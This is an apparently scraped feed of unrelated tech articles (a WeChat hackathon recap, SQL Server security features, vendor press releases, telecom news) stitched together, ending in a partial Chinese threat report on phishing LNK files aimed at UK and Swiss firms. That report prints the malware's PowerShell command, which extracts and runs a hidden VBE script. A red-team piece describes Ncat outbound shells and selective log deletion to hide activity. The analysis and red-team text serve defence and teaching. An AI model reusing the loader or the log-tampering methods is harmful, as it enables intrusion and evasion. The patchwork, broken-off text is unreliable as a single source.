换听小程序利用 AI 功能,将文字内容转换为语音内容,并为使用者建立待听列表,将获取内容的方式由“看”换为“听”,解放使用者的双眼。其队长坦言,完成这款功能完善的小程序开发,真正用的时间不过 10 个小时。

英语口语助手小程序以电影配音的方式,提供了低门槛进行口语练习的工具,解决了师生互动以及内容沉淀的问题。

除此之外, 时锦 小程序还设定了非常动人的 slogan――“每个人都是一本书”,还有的小程序甚至规划出了完整的商业模式。

小小幼教小程序最终摘下桂冠

在 28 小时 的竞速开发后,各团队将作品进行了展示。通过评委打分和团队互评,小小幼教小程序最终摘下桂冠!


微信小程序黑客马拉松落幕,28小时见证27个小程序从0到1诞生!

获得二等奖和三等奖的分别是 AI 有声小程序和英语口语助手小程序。

轻芒合伙人、小程序资深观察员阿禅表示, 小程序的「小」和各种被吐槽的「规则」看起来是「讨厌的」限制,但事实上反而给开发者提供了冷静下来先思考解决什么问题、如何解决问题,再去想其他事情。 他还提到:“优秀的产品是从解决真实场景下的问题为出发点,不是为了完成任务而设置一些很奇怪的应用场景。在 WeGeek Hackathon 上很多参赛者把思考放在解决问题本身,回到了产品的本质,这是非常好的。”

爱范儿 CTO 何世友表示,非常兴奋能亲历小程序在创意落地上的“执行力”,科技的进步往往不是一蹴而就,更多时候 正是以降低一点门槛这种方式逐渐累积成质变。

SegmentFault思否 CTO 祁宁表示, 微信小程序为开发者提供了天然的流量入口与传播渠道,可以让开发人员专注于产品建设,丰富的接口和 SDK 支持降低了上手难度。 在 WeGeek Hackathon 上开发者展现了强大执行力与创意,更可贵的是一些产品中还体现了人文关怀。他个人特别欣赏敢于想象的精神,希望能有更多的开发者从幕后走到台前,在小程序上展现大理想。

活动最后,阿禅还对参赛作品进行了逐一点评,并且从商业价值方面给予了专业的指导。很多参赛者表示获益良多。


微信小程序黑客马拉松落幕,28小时见证27个小程序从0到1诞生!
WeGeek Hackathon助力更好的小程序生态

此次 WeGeek Hackathon 汇聚了五湖四海的开发者,各行各业的小程序爱好者通过小程序将自己的想法变成了现实。有参赛者表示“我的想法落地了,虽然没有获奖,但是我感觉非常值得”。有的参赛者在现场临时组队,短时间的思想碰撞激发出了他们的灵感火花,两天过去,他们成为了默契的队友,比赛之后还将会继续将小程序开发进行到底。

WeGeek Hackathon 将会继续助力更好的小程序生态,为小程序的开发者和爱好者们提供一个展示自己的舞台。

Red Team Assessment Phases: Completing Objectives

$
0
0

The purpose of this phase of the assessment is fairly self-explanatory. In previous phases, the red team performed the operations necessary to set themselves up for success in achieving the goals of the assessment. This phase is focused on achieving those goals and often happens somewhat in parallel with the previous phase (e.g., it would be ridiculous not to grab a “flag” on a compromised machine because the red team wasn’t prepared to grab all of them). In the end, completing this phase and all previous ones should result in achieving all operational objectives or the ability to describe in detail why one or more were impossible to complete (i.e., because the client was doing a good job).

Scoping the Phase

The scope of this phase is defined by the goals of the assessment as defined during the planning session and included in the red team assessment agreement. These goals may range from collecting a certain set of defined “flags” (like sensitive data that should be protected for regulatory compliance) to a more “freeform” exercise in which the red team is instructed to exploit the client’s organization as fully as possible. Depending on the goals of the assessment, the red team may engage in a variety of activities on the target network in order to successfully complete the assessment.

Achieving Phase Goals

The goal of this phase is fairly straightforward yet also depends on the specifics of a certain assessment. As part of the planning and negotiation phase of the assessment, the red team will determine and agree on the goals and rules of engagement of the exercise with the client. In this phase, the red team will explore and exploit targets, exfiltrate collected data and perform cleanup activities in order to achieve the agreed-upon operational objectives.

Target Exploration

Most organizations have perimeter-focused cyber-defenses. The logic is that if they keep the “bad guys” out of the network, then it doesn’t really matter what’s happening inside of the network since all actions are taken by employees who (presumably) have no reason to try to harm the organization. However, once the red team has breached the organization’s defenses and established a foothold, this approach toward cybersecurity means that the red team has increased flexibility in what they can do.

Once inside the target network or on an exploited computer, exploration is key to a successful assessment. One of the responsibilities of the red team is to inform their clients about oversights in their cybersecurity. If a flag (like sensitive data) is known to be on a hardened machine, then trying to crack that machine is a must for the assessment. However, finding an unauthorized copy in a less-defended location is as if not more valuable to the client. By exploring each location that they’ve compromised, the red team brings a fresh set of eyes to the organization’s security and may find nuggets formerly overlooked as “impossible.”

Exploiting Targets of Opportunity

Depending on the terms of the red team assessment agreement, the goals of the exercise may not be clearly defined. In some assessments, the red team is provided with a set of “flags” to achieve (certain levels of access, credentials, data exfiltration and so on) and only finding these flags is necessary for a successful exercise. In other situations, the red team may be instructed to do anything that they can to exploit the network, with a full report of identified vulnerabilities to be reported at the end of the exercise.

In a more freeform exercise, exploitation of targets of opportunity is an essential part of the assessment. If, during target exploration, the red team identifies a way to gain access to a machine within the internal network, they should do so if it will not compromise the goals of the exercise (e.g., get them detected by the network defenders). Examples of targets of opportunity include unpatched services or operating systems, access to password hashes on a computer or domain controller and unattended documents or removable media discovered during a physical assessment. Since the red team testers are the “good guys,” it’s important to take care not to cause any unnecessary damage to the network or other operations.

Data Exfiltration

In many red team assessment, data exfiltration is a crucial component of achieving the assessment objectives. In many cases, organizations want the red team to demonstrate the fact that data can actually be exfiltrated from the organizational network (since it’s difficult to breach data if you can’t get it off of the organization’s network).

In the previous phase, setting up covert communications channels was one of the goals of the phase. These methods may include using a certain port for something other than its intended purpose in order to take advantage of the fact that firewalls commonly leave certain ports open (80 for HTTP, 443 for HTTPS and so on).

Ncat (developed by the same group that makes the nmap network scanning tool) is a great tool for use in data exfiltration and command and control. By setting up a listener on an external computer and connecting to the listener on another, the red team can bypass firewall rules by creating an outbound connection (not commonly blocked) to a computer belonging to the red team. This connection can be used to control the remote computer (via shell access) and to exfiltrate data (including using TLS encryption).

Cleanup

An important final stage in this stage of a red team assessment is cleaning up the effects of the red team on the target environment. A folder full of hacking tools on exploited machines and log files showing access attempts to different computers make it obvious to a network defender that something is going on. For the assessment to be realistic, red teams need to cover their tracks so as to not make things too easy for the network defenders.

One of the most common techniques for cleanup is the destruction of log files (used in 75% of real attacks, according to some reports). While red teams need to remain secret in order to carry out a realistic and useful assessment for the client, care should be taken in the cleanup stage of the operation. For example, hackers may corrupt or delete log files to hide their attacks, but this is probably not a viable option for a red team since it may hurt the organization and hide a real attack that happens to be occurring at the same time as the assessment.

An alternative to full log destruction is selective deletion of compromising records on the log. By removing only the log entries that show their presence on the system, the red team can conceal their operations without hurting the security of the target organization against real attacks. Recording the original version of the log file (before deletions is also a good idea). However, the subject of cleanup should be discussed and included in the red team assessment agreement to ensure that the customer is comfortable with the red team modifying security logs on their environment.

Pen-Testing Training

Setting the Stage

The next and final phase of a red team assessment is reporting. In the end, the reason that the client is paying for the assessment in order to learn what they need to fix to secure their network.

In order to be successful in the reporting phase, the red team needs to take careful notes throughout the course of all of the preceding phases of the assessment. This allows them to provide comprehensive detail of their operations (which can be extremely important if something goes wrong) and detailed instructions for replicating exploits that can be used by the client to verify findings and test potential mitigations.

Sources Ncat , Nmap Hackers are increasingly destroying logs to hide attacks , ZDNet

Security Features in SQL Server 2017

$
0
0

Microsoft has a number of security features in SQL Server 2017 that are useful for different purposes, depending on what you are trying to protect and what threat(s) you are trying to protect against. Some of these security features can have performance implications that you should be aware of as you decide which ones you want to implement. As an introduction, I’ll cover some the highlights of several of these security features.

Transparent Database Encryption (TDE)

Transparent Data Encryption (TDE) is SQL Server’s form of encryption at rest, which means that your data files, log file, tempdb files, and your SQL Server full, differential, and log backups will be encrypted when you enable TDE on a user database. This protects your data from someone getting access to those database or database backup files as long as that person doesn’t also have access to your encryption certificates and keys.

The initial TDE encryption scan for a user database will use one background CPU thread per data file in the database (if the data files are located on separate logical drives), to slowly read the entire contents of the data file into memory at the rate of about 52MB/second per data file (if the data files are located on separate logical drives).

The data is then encrypted with your chosen encryption algorithm, and then written back out to the data file at about 55MB/per second (per data file, if they are on separate logical drives). These sequential read and write rates appear to be purposely throttled and are consistent in my testing on multiple systems with various types of storage.

The initial TDE encryption process happens at the page level, underneath SQL Server, so it does not cause locking or generate transaction log activity like you would see with rebuilding an index. You can pause a TDE encryption scan by enabling global TF 5004, and un-pause it by disabling TF 5004 and running your ALTER DATABASE dbNAME SET ENCRYTION ON command again, with no loss of progress.

The CPU impact of encryption/decryption is greatly reduced on SQL Server 2016 and newer if you have a processor that supports AES-NI hardware instructions . In the server space, these were introduced in the Intel Xeon 5600 product family (Westmere-EP) for two-socket servers and the Intel Xeon E7-4800/8800 product family (Westmere-EX) for four and eight-socket servers. Any newer Intel product family will also have AES-NI support. If you are in doubt about whether your processor supports AES-NI, you can look for “AES” in the instructions field output from CPU-Z, like you see in Figure 1.


Security Features in SQL Server 2017
Figure 1: CPU-Z Output Showing AES Instruction Support

After you have encrypted a database with TDE, the runtime impact of TDE is hard to predictably quantify because it absolutely depends on your workload. If for example, your workload fits entirely in the SQL Server buffer pool then there would be essentially zero overhead from TDE. If on the other hand your workload consisted entirely of table scans where the page is read and then flushed almost immediately that would impose the maximum penalty.The maximum penalty for an I/O volatile workload is typically less than 5% with modern hardware and with SQL Server 2016 or later.

The extra work of TDE decryption happens when you read data into the buffer pool from storage, and the extra work of TDE encryption happens when you write the data back out to storage. Making sure you are not under memory pressure, by having a large enough buffer pool and by doing index and query tuning will obviously reduce the performance impact of TDE. TDE does not encrypt FILESTREAM data, and a TDE encrypted database will not use instant file initialization for its data files.

Before SQL Server 2016, TDE and native backup compression did not work well together. With SQL Server 2016 and later, you can use TDE and native backup compression together as long as you specify a MAXTRANSFERSIZE that is greater than 64K in the backup command. It is also very important that you are current with your cumulative updates, since there have been multiple important TDE-related hotfixes for both SQL Server 2016 and SQL Server 2017. Finally, TDE is still and Enterprise Edition only feature, even after SQL Server 2016 SP1 (which added many Enterprise-only features to Standard Edition).

Row-Level Security (RLS)

Row-Level Security (RLS) limits read access and most write-level access based on attributes of the user. RLS uses what is called predicate-based access control. SQL Server applies the access restrictions in the database tier, and they will be applied every time that data access is attempted from any tier.

RLS works by creating a predicate function that limits the rows that a user can access and then using a security policy and security predicate to apply that function to a table.

There are two types of security predicates, which are filter predicates and block predicates. Filter predicates will silently filter the rows available to read operations (SELECT, UPDATE, and DELETE), by essentially adding a WHERE clause that prevents the filtered rows from showing up in the result set. Filter predicates are applied while reading the data from the base table, and the user or application won’t know that rows are being filtered from the results. It is important, from a performance perspective, to have a row store index that covers your RLS filter predicate.

Block predicates explicitly, (with an error message) block write operations (AFTER INSERT, AFTER UPDATE, BEFORE UPDATE, and BEFORE DELETE) that would violate the block predicate.

Filter and block predicates are created as inline table-valued functions . You will also need to use the CREATE SECURITY POLICY T-SQL statement to apply and enable the filtering function to the relevant base table

RLS was added in SQL Server 2016 and is available in all editions of SQL Server 2016 and newer. RLS will not work with Filestream, Polybase, and indexed views. RLS can hurt the performance of Full-Text Search and it can force columnstore indexes queries to end up using row mode instead of batch mode. This Microsoft blog post has more information about the performance impact of RLS. A good example of how to use Query Store to tune RLS performance is here .

Dynamic Data Masking (DDM) Dynamic data masking (DDM) can help limit sensitive data exposure by masking it to non-privileged users. DDM is applied at the table

Signal Sciences Named a 2018 Gartner Peer Insights Customers’ Choice for Web Ap ...

$
0
0
Distinction based on end-user ratings of their experience purchasing
and using Signal Sciences next-gen WAF CULVER CITY, Calif. (BUSINESS WIRE) lt;a href=”https://twitter.com/hashtag/DevOps?src=hash” target=”_blank”gt;#DevOpslt;/agt;

Signal

, the world’s most trusted web defense solution, announced today that it has been named a

2018

Gartner Peer Insights Customers’ Choice for Web Application Firewalls

. The Gartner Peer Insights Customers’ Choice is a recognition

of “the best Web Application Firewalls” on the market as reviewed by

customers. To receive this distinction, a vendor must have a minimum

number of published reviews with an average overall rating above a

certain threshold.


Signal Sciences Named a 2018 Gartner Peer Insights Customers’ Choice for Web Ap ...

We believe the 2018 Gartner Peer Insights Customers’ Choice distinction

is the latest validation point for Signal Sciences and its innovation in

the WAF market. As the fastest-growing web application security company

in the market, Signal Sciences protects more than 10,000 applications

and over 200 billion production requests per week. Strong customer

demand has tripled revenue growth each year as organizations deploy

Signal Sciences to secure their most important web applications, APIs,

and microservices.

Signal Sciences received 5 out of 5 stars from over 80 verified customer

reviews from multiple vertical industries, including financial services,

healthcare, manufacturing, retail, media, and government, among others,

as of December 13, 2018 for its next-gen WAF. A highlight of the reviews

on Gartner Peer Insights that contributed to the company’s recognition

include:

“Unlike the majority of WAF products out there, Signal Sciences does
not need hundreds of stateful rules to function properly. We were able
to get Signal Sciences up and running within a few days and only
required 10 or so rules to get configured and running in full-block
mode.”

Head

of Information Security, Infrastructure & IT, Finance Industry

“Signal Sciences is by far the only security product I’ve used that
was not only simple to install, but also simple to use. We went from a
POC to purchase in just weeks (usually it takes months) and once we
installed it, we instantly put the WAF into blocking mode as it did
such a good job without false positives.”

Senior

Security Engineer, Communications Industry

“Web Application Firewalls have historically been a tricky piece of
technology to leverage in existing environments; Signal Sciences’
approach means less operational overhead in getting it working and
more time being spent leveraging the data it provides.”

Security

and Risk Management, Healthcare Industry

“Almost an out-of-the-box solution for a complex footprint. The agent
installation took about 10 min, the portal was created in 15 mins, we
were seeing true alerts in less than 1hr.”

Enterprise

Architect, Manufacturing Industry

“WAF has been a stale technology space for years, and the industry has

been starving for innovation,” said Andrew Peterson, CEO of Signal

Sciences. “We designed our revolutionary WAF solution to combat today’s

application security threats. To us, Signal Sciences’ 5 out of 5 star

rating on Gartner Peer Insights is a validation that our next-gen WAF

technology is the innovation customers have been waiting for. We’re

grateful to be working with customers, such as Under Armour, Adobe, Chef

and WeWork, among others, and we will continue to protect them and the

rest of our customers against more than 100 million web attacks we

monitor every month.”

Signal Sciences next-gen WAF and RASP technology is the only solution in

the application security market that works across any architecture,

providing the broadest coverage against real threats and attack

scenarios as well as integrations into DevOps tools that enable

engineering and operations teams to share security responsibility.

To see all Signal Sciences Gartner Peer Insights Customers’ Choice

reviews, please visit: https://www.gartner.com/reviews/market/web-application-firewalls/vendor/signal-science

Related Links:

● Announcement:

LeanTaaS

Secures Cloud-Based Apps on AWS with Signal Sciences

● Announcement:

Remitly

Implements Signal Sciences to Protect Sensitive Mobile Customer Data and

Ensure PCI Compliance

● Announcement:

Signal

Sciences Announces Network Learning Exchange and Power Rules for

Unrivaled Web Application Threat Detection and Prevention

● Blog:

Security’s

Shift Right

● Blog:

Three

Ways Legacy WAFs Fail

● Blog:

Demand

More From Your Web Application Firewall

Follow Signal Sciences:

● Twitter: @SignalSciences

● Facebook: SignalSciences

● LinkedIn: signal-sciences

About Peer Insights:

Peer Insights is an online platform of ratings and reviews of IT

software and services that are written and read by IT professionals and

technology decision-makers. The goal is to help IT leaders make more

insightful purchase decisions and help technology providers improve

their products by receiving objective, unbiased feedback from their

customers. Gartner Peer Insights includes more than 70,000 verified

reviews in more than 200 markets. For more information, please visit www.gartner.com/reviews/home .

Gartner Peer Insights Customers’ Choice constitute the subjective
opinions of individual end-user reviews, ratings, and data applied
against a documented methodology; they neither represent the views of,
nor constitute an endorsement by, Gartner or its affiliates.

About Signal Sciences

Signal Sciences protects the web presence of the world’s leading brands.

With its patented approach to WAF and RASP, Signal Sciences helps

companies defend their journey to the cloud and DevOps with a practical

and proven approach, built by one of the first teams to experience the

shift. Based in Culver City, California, Signal Sciences customers

include Under Armour, Etsy, Adobe, Datadog, WeWork and more. For more

information, please visit www.signalsciences.com .

Contacts

Juanita Mo

424-404-1200

press@signalsciences.com
Signal Sciences Named a 2018 Gartner Peer Insights Customers’ Choice for Web Ap ...
Do you think you can beat this Sweet post? If so, you may have what it takes to become a Sweetcode contributor...Learn More.

Industrial IoT platform gets updates from Pulse Secure

$
0
0

A new version of Industrial IoT platform, Pulse Secure version 9.0R3 aims to help their customers secure industrial IoT and streamline maintenance activities for greater production line output.

Pulse Secure, a provider of Secure Access solutions to both enterprises and service providers,announced the release of Pulse Policy Secure (PPS) 9.0R3 to extend its Zero Trust Security model to IIoT devices and smart factories. The new version enables factories to streamline machinery repairs and diminish costly production downtime through IT-managed secure access. It also secures networks by expanding its behavioral analytics toIoT devices, detecting anomalies and preventing their compromise.

PPS dynamically profiles a networkto discover, classify and apply policiesto IoT devices and includes a built-in IoT device identification library. The solution also integrates with Next Generation Firewall (NGFW) solutions to provide identity and device security state data, as well as to fortify micro-segmentation to isolate and manage IoT devices on enterprises networks.

Aberdeen recently reported that 82 percent of companies reported unplanned downtime in the past three years, which can cost a company as much as $260,000 an hour The resulting downtime breaks production and lowers profit, because factory floor repairs often take days when security requirements mandate that service technicians physically visit the factory to diagnose and repair the problem.

How PPS Reduces Risks for Manufacturers

The latest PPS release uses a combined NAC and VPN approach thatenablesIT teams to grant remote secure access - authenticated and encrypted - to support contractors for expedited repair and return to service of factory IIoT systems for greater uptime and productivity.

The latest release of PPS also provides sophisticated behavioralanalytics that alert security teams of anomalous IoT device behavior and automatically requires added factors of authentication. PPS 9.0 builds baseline behavior profiles for managed and unmanaged IoT devices utilizing information correlated from multiple sources such as NetFlow, user and device data. With these profiles, the platform detects anomalous activity, malware infections and domain generation attacks, allowing security teams to be more responsive to threats and take preemptive measures before attacks succeed.

PPS 9.0 automatically discovers and profiles IIoT systems, such as factory floor SCADAs, PLCs and HMIs, or office building HVAC systems, providing dynamic visibility and securing them by enforcing policies for local and remote access by authorized users and contractors. PPS 9.0 also automatically provisions IIoT devices to next-generation firewalls (NGFWs) to facilitate remote access without provisioning overhead.

“Manufacturing customers are using IoT to retool their factory floors, creating smart production lines that report their health and operational efficiency. One benefit of this approach is that customers can proactively perform preventative or predictive maintenance on machines to avoid costly production outages,” said Prakash Mana, Pulse Secure’s vice president of product management. “Our latest Pulse Secure release helps customers not only secure the smart factory floor, but it also helps streamline their maintenance activities by giving service technicians remote access to the equipment they maintain. Regardless if they are on the factory floor or in their remote office, our Zero Trust Security limits technician access to the equipment they maintain and requires that they use secured end-user devices to perform their work.”

Read more: https://www.pulsesecure.net

A new way to manage your development projects

Learn the best ways to organize your app development projects, and keep code straight, clients happy, and breathe a easier through launches.

The Latest Nerd Ranch Guide (3rd Edition) to Android Programming

Write and run code every step of the way, using Android Studio to create apps that integrate with other apps, download and display pictures from the web, play sounds, and more. Each chapter and app has been designed and tested to provide the knowledge and experience you need to get started in Android development.

Starting your own app business?

How to create a profitable, sustainable business developing and marketing mobile apps.

Pure Storage: ML leads to high NPS

$
0
0

Pure Storage uses machine learning to help its customers' systems run better, and some of its customers use Pure Storage arrays to make their machine learning systems run better.

Each Pure Storage array generates between 600MB and 1GB of telemetry data per day, including behavioural data concerning workload characteristics, Pure Storage international CTO Alex McMullan told iTWire .

Different types of data are directed to different streams. So temperature alerts and information about network issues flow to the help desk for immediate attention. Some issues can be fixed remotely, often before an actual fault occurs; others are brought to the customer's attention.

This type of service has led to Pure achieving an NPS (net promoter score) in the mid 80s, he said. For comparison, Macquarie Telecom claims "Australia's best" customer experience based on an NPS of 76, and the average NPS of the Australian retail industry is 15 according to the Perceptive Group .

If you think an NPS of 15 sounds low, keep in mind that retail achieved the second-highest industry-wide NPS in Australia for 2018, trailing only the charity sector which had an NPS of 27. US retail managed 54, according to Forbes

.

But back to Pure's telemetry. Applying machine learning to the data also allows the company to identify issues caused by hardware or software provided by other vendors. In addition, customers can use it to predict the effect of making changes to their arrays, such as upgrading a controller.

The company is very aware that there are significant differences between workloads. Pure Storage was originally used largely in conjunction with VMware, etc, but now software such as Mongo and Cassandra is commonplace, and these workloads have very different characteristics in terms of storage use. So the models used to analyse the telemetry data keep changing ― Pure's "data science team never stops," said McMullan.

To process all this data, Pure augments its on-premises infrastructure with AWS, which McMullan describes as "a great force multiplier."

Pure has more than 10PB of data stored on AWS, but "much more" is stored on premises. The company is moving even more data on-premises in order to take advantage of its ownFlashBlade hardware to improve analytics performance.

Looking at AI more generally, McMullan sees it as "an undisciplined, unregulated space." What regulations there are vary significantly in different jurisdictions, there's no agreement on how accurate a model needs to be (see, for example, recent concerns over the accuracy of face recognition used by the police in the UK), and the 'black box' nature of most models leaves people wondering whether any conscious or unconscious bias has gone into their development.

McMullan suggests that if the international community can agree on air traffic lanes, it should be able to come up with overarching guidelines for AI.

He's not suggesting that all applications should be regarded in the same way. But there will be a high level of reliance on some AIs (eg, autonomous vehicles), so lots of ongoing checks are reasonable, especially when a given set of inputs do not necessarily lead to the same output.

It's important to realise that the computer isn't always right, he suggested.

Another issue that needs attention is data ownership (does healthcare and vehicle data belong to the individual or the owner, or to the manufacturer or a third-party provider?), he said.

That raises some interesting issues. Should a hospital be allowed to train an AI using patients' data without their explicit consent? Is that consent meaningful if it was granted as part of 'take it or leave it' terms and conditions, eg no consent means no treatment. Should future patients only benefit from their predecessors' contribution to the development of AI-assisted diagnosis and treatment if they in turn allow their data to be used in that tool's ongoing development and training?

47 REASONS TO ATTEND YOW! 2018

With 4 keynotes + 33 talks + 10 in-depth workshops from world-class speakers, YOW! is your chance to learn more about the latest software trends, practices and technologies and interact with many of the people who created them.

Speakers this year include Anita Sengupta (Rocket Scientist and Sr. VP Engineering at Hyperloop One), Brendan Gregg (Sr. Performance Architect Netflix), Jessica Kerr (Developer, Speaker, Writer and Lead Engineer at Atomist) and Kent Beck (Author Extreme Programming, Test Driven Development).

YOW! 2018 is a great place to network with the best and brightest software developers in Australia. You’ll
be amazed by the great ideas (and perhaps great talent) you’ll take back to the office!

Register now for YOW! Conference

Sydney 29-30 November

Brisbane 3-4 December

Melbourne 6-7 December

Register now for YOW! Workshops

Sydney 27-28 November

Melbourne 4-5 December

REGISTER NOW!

LEARN HOW TO REDUCE YOUR RISK OF A CYBER ATTACK

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts’ payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you’ll learn:

How does business security get breached?

What can it cost to get it wrong?

6 actionable tips

DOWNLOAD NOW!

T-Mobile and Sprint merger officially cleared by US national security panel, sti ...

$
0
0

It wasreported on Friday that T-Mobile and Sprint would likely receive approval from U.S. national security officials for their $26 billion merger. The Wall Street Journal reports that T-Mobile was granted approval for its takeover of Sprint today after “several months of negotiation with company representatives.”


T-Mobile and Sprint merger officially cleared by US national security panel, sti ...
Sylvania HomeKit Light Strip

The approval comes from the Committee on Foreign Investment in the U.S., or Cfius. The committee is led by the Treasury Department and is tasked with reviewing foreign deals for national security concerns. It can recommend the president block potential deals if such issues are uncovered.

In the case of the deal between Sprint and T-Mobile, Cfius is obligated to review details because T-Mobile’s majority owner is Deutsche Telekom, which is Germany-based. Meanwhile, Sprint’s parent, SoftBank Group, is Japan-based.

Friday’s report stated that approval of the deal was contingent upon both parent companies agreeing to reduce their use of Huawei devices. Today’s report notes that Cfius previously required Sprint to remove Huawei equipment from its U.S. network in 2013 when SoftBank purchased a controlling stake in the carrier. Deutsche Telekom went through a similar process when it entered the U.S. market.

This time around, however, neither Deutsche Telekom nor SoftBank are required to “significantly change its business or operations” as a result of the Cfius review. Changes are limited to T-Mobile, Sprint, and their subsidiaries, the report says:

Neither Deutsche Telekom nor SoftBank is required to significantly change its own business or operations as a result of Cfius’s demands, according to the terms of the merger. Any potential changes are limited to T-Mobile, Sprint and their respective subsidiaries, deal documents show.

Of note, Cfius has no insight into the networks overseas of Deutsche Telekom and SoftBank.

Approval by Cfius is only the next step in the approval process for the T-Mobile and Sprint deal. The takeover still needs approval from antitrust officials including the FCC and DOJ. The FCC review just recently resumed after a briefdelay in September. The deal faces pushback from several parties who fear it would reduce competition, cost thousands of jobs, and more.

Subscribe to 9to5Mac on YouTube for more Apple news:

Akamai Received Top Scores in Gartner’s New Report "Critical Capabilities for ...

$
0
0

Are you in the process of selecting a web application firewall (WAF) or thinking about whether your current solution is adequate? For many organizations selecting the right WAF to protect their business is not an easy task. The threat landscape is changing fast and hackers are very creative in their own ways. The good news is that Gartner just released a new report “ Critical Capabilities for Cloud Web Application Firewalls Services ” written by Jeremy D’Hoinne, Ayal Tirosh, Claudio Neiva, Adam Hils, 6 December 2018. Gartner compares key WAF vendors by looking at three industry relevant use cases. I am proud to say that Akamai received top scores on two out of the three use cases.

Mobile application Web scale critical business application Public facing web application

The Akamai results matter to you for the following reasons:

1) In the use case Mobile Application, Akamai achieved the highest score with 3.38 out of 5. This is especially relevant as more and more organizations open their business via APIs and mobile applications. As pointed out in Akamai’s State of the Internet Summer 2018 report , we have seen that bots are trying to evade detection or pretend to be a human being for fraud and abuse purposes. Imitation of mobile device browsers is on the rise and currently one of the most common types of browser imitation.


Akamai Received Top Scores in Gartner’s New Report

2) In the use case Web Scale Critical Business Applications Akamai scores highest with 3.7 out of 5. Critical business applications are the crown jewels and are, therefore, of special interest for hackers and malicious attacks. As the legendary bank robber Willie Sutton replied when asked why he robbed banks, “Because that’s where the money is.” Business critical applications are the “bank” in the cyber world and Akamai helps you to protect your “bank” with our edge security solutions like WAF and bot management.


Akamai Received Top Scores in Gartner’s New Report

3) In the use case Public Facing Web Applications Akamai scored a 3.36 out of 5. Well, we can’t win everything. But jokes aside, organizations simply don’t have the people or time to protect all of their public-facing websites. We just announced a new capability in October an additional firewall rule set, which provides automated protection of websites, applications and APIs with minimal operational effort for our customers. This allows them to quickly apply automated protection for many additional sites that go online on short notice or for a short period of time or just host less sensitive information and therefore remained unprotected so far.


Akamai Received Top Scores in Gartner’s New Report

What else is covered in this report?

Gartner discusses several critical WAF capabilities. I will not review all of them, but just highlight a few which have especially high relevance after this year’s security events.

I do agree that DDoS protection is a critical capability. This is particularly obvious, as we have seen a 16% increase in the number of DDoS attacks during the last year. The industry also experienced the largest ever DDoS attack, Memcached , earlier this year. Basically the attack size doubles every two years.

This increase in overall attacks leads to geographic scalability and presence . This is important for two reasons. First, as a security vendor, you want to be where you customers are to provide them the best experience. Second, you want to be as close to the attackers in order to mitigate them as quickly as possible. Akamai usually is only one hop away from 90% of all attackers, which keeps malicious traffic off the network and results in less interference. Also, Akamai’s huge footprint allows our experts to see, follow and mitigate a massive number of daily attacks. This knowledge is transferred into Akamai’s firewall rules and security products, to make them one of the best in the industry.

I completely agree that API security is growing in importance. In a series of blog posts titled “The Dark Side of APIs” ( 1 , 2 and 3 ), Akamai researchers raised concerns about how little many organizations know about the traffic hitting the interfaces used for computer- to-computer interaction. Considering that API traffic now constitutes more than 25% of all web traffic Akamai sees, we believe this is something organizations should also be concerned with.

Akamai was already leading the industry when it introduced a positive security model two years ago. In October, we took API security to the next level with automated protection, which makes it easier for organizations to scale their security posture. Not covered in this report is our API gateway , which provides our customers the ability to add API governance to their security footprint. Our all around API solution now gives our customers

improved API performance, security and governance.

In summary we are very proud that Akamai’s solutions received another outstanding recognition from Gartner after their 2018 Magic Quadrant for web application firewalls , which shows steady progress of our 100% cloud based WAF and edge security solution.

So, if you are looking for a security solution to protect your web applications and APIs against DDoS, web or bot attacks, give us a call or click to chat with us. Or just take a test drive on a free trial .

Looking forward to hearing from you.

Stay safe!

The graphics were published by Gartner, Inc as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Akamai .

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consists of opinions of Gartner’s research organization and should not be construed as statemen

使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动

$
0
0
一、 概述

近日,腾讯御见威胁情报中心在日常的恶意文件运营中,发现了几个可疑的钓鱼lnk(伪装成快捷方式文件的攻击程序)。经过分析发现,这些lnk构造巧妙,全程无PE文件落地(Fileless攻击),并且把解密key和C2存放在了twitter、youtube等社交站点上。

从关联到的样本来看,攻击针对英国、瑞士等欧洲国家,攻击目标为外贸、金融相关企业。暂时还不详具体的攻击者背景,望安全社区同仁一起来完善攻击的拼图。

该APT组织攻击手法的一些特点:

1.诱饵文件为压缩包中伪装成PDF文档的LNK文件(LNK默认是快捷方式,恶意程序执行后会打开一个欺骗性的PDF文件,这个组合极有欺骗性);

2.攻击过程中,全程无PE文件落地,巧妙避开安全软件的常规检测;

3.攻击程序会判断电脑是否安装网络嗅探工具(wireshark和Nmap,通常为安全研究人员用于网络抓包分析),如果有,就不执行木马核心功能;

4.通过youtube、twitter、Google、wordpress.com的公共空间更新C2,存放解密代码;

5.收集目标计算机名、杀毒软件信息、系统安全时间、系统版本等情报,定时截屏上传;

6.检测是否存在虚拟机等特殊软件。

二、技术分析 1.攻击诱饵

本次攻击的诱饵是一个zip压缩包,名字为:Dubai_Lawyers_update_2018.zip,压缩报里包含2个lnk文件:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动

而lnk为攻击者精心构造的恶意lnk,点击运行lnk后,会触发执行包含的恶意代码:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
其中,压缩包里的两个lnk的内容类似,我们以其中一个为例进行详细分析。 2.lnk分析

运行lnk后,执行的恶意代码如下:

Cmd.exe "/c powershell -c "$m='A_Dhabi.pdf.lnk';$t=[environment]::getenvironmentvariable('tmp');cp$m $t\$m;$z=$t+'\'+@(gci -name $t $m -rec)[0];$a=gc $z|out-string;$q=$a[($a.length-2340)..$a.length];[io.file]::WriteAllbytes($t+'\.vbe',$q);CsCrIpT$t'\.vbe'"

该命令的主要功能为:

1)将dubai.pdf.lnk文件复制到”%temp%”目录;

2)将lnk文件结尾处往回2340字节的内容,写入“%temp%\.vbe“文件中;

3)利用cscript.exe将vbe给执行起来。

写入的.vbe文件为使用Encoded加密的脚本文件:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
解密后内容如下:
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
3.Vbe脚本分析

